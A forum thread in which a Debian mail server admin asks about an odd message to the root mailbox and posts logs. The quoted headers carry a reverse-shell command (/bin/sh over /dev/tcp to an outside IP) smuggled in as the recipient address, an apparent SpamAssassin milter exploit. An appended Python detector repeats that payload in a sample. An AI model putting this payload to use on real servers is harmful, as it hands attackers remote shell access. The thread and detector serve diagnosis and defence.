  1. #1
    Just Joined!
    Join Date
    Apr 2008
    Location
    Catalonia
    Posts
    35

    [SOLVED] Debian mail server root mailbox received a strange message


    Hello,

    I administer a new production mail server under Debian GNU/Linux 5.0 lenny. The other day I installed and configured Postfix and Dovecot, with no spam filtering or virus detection tools or complements.

    Today I noticed that the root mailbox has received a message from blue@dick.com. Is this some vulnerability? I'm not sure whether this represents a security problem or not.

    /var/log/mail.log:

    Code:
    Feb 15 11:16:10 postfix/smtpd[31314]: connect from b202.blue.fastwebserver.de[62.141.42.202]
    Feb 15 11:16:12 postfix/smtpd[31314]: 9AB3E11104B9: client=b202.blue.fastwebserver.de[62.141.42.202]
    Feb 15 11:16:12 postfix/qmgr[30491]: 9AB3E11104B9: from=<blue@dick.com>, size=405, nrcpt=1 (queue active)
    Feb 15 11:16:12 postfix/smtpd[31314]: disconnect from b202.blue.fastwebserver.de[62.141.42.202]

    Thank you!!
    Last edited by jordi; 02-16-2011 at 03:48 PM.

  2. #2
    Just Joined!
    Join Date
    Apr 2008
    Location
    Catalonia
    Posts
    35
    Here is the part of the expanded header:

    Code:
    X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
    Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"@machine.example.com

  3. #3
    Just Joined!
    Join Date
    Apr 2008
    Location
    Catalonia
    Posts
    35
    It seems that only a certain version of SpamAssassin Milter Plugin is compromised.
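
The recipient in the headers posted in #2 is a shell command, not a mailbox name. As an added example (not part of the original thread), this Python script flags stored messages whose `X-Original-To` or `Delivered-To` header carries that kind of recipient; the function names, the pattern list, and the sample messages (with a documentation-range IP and made-up port) are assumptions constructed for illustration.

```python
import re
from email import message_from_string

# Headers the MTA adds at delivery time, recording the envelope recipient.
RECIPIENT_HEADERS = ("X-Original-To", "Delivered-To")

# Heuristics (assumed, not exhaustive): things a shell interprets that a mailbox name rarely contains.
SUSPICIOUS = [
    (re.compile(r"\|"), "pipe character"),
    (re.compile(r"[;`<>&]|\$\("), "shell metacharacter"),
    (re.compile(r"/dev/(tcp|udp)/"), "bash network redirection"),
]

# Constructed samples modelled on the headers in post #2 (IP and port are placeholders).
SAMPLE_BAD = (
    'X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/192.0.2.1/4444 1>&0 2>&0"\n'
    'Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/192.0.2.1/4444 1>&0 2>&0"'
    "@machine.example.com\n"
    "From: sender@example.org\n\nbody\n"
)
SAMPLE_OK = (
    "X-Original-To: root@machine.example.com\n"
    "Delivered-To: <root@machine.example.com>\n\nbody\n"
)

def check_recipient(value):
    """Return the reasons a recipient header value looks like a shell command."""
    addr = value.strip()
    if addr.startswith("<") and addr.endswith(">"):
        addr = addr[1:-1]                      # drop framing angle brackets
    local = re.sub(r"@[A-Za-z0-9.-]+$", "", addr)  # inspect the local part only
    return [reason for pattern, reason in SUSPICIOUS if pattern.search(local)]

def scan_message(raw):
    """Return {header: [reasons]} for every suspicious recipient header in a raw message."""
    msg = message_from_string(raw)
    findings = {}
    for name in RECIPIENT_HEADERS:
        for value in msg.get_all(name, []):
            reasons = check_recipient(value)
            if reasons:
                findings.setdefault(name, []).extend(reasons)
    return findings

if __name__ == "__main__":
    for label, raw in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        print(label, scan_message(raw))
```

Run over a mail spool or Maildir, a non-empty result marks a message to inspect by hand; it says nothing about whether the command was ever executed.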
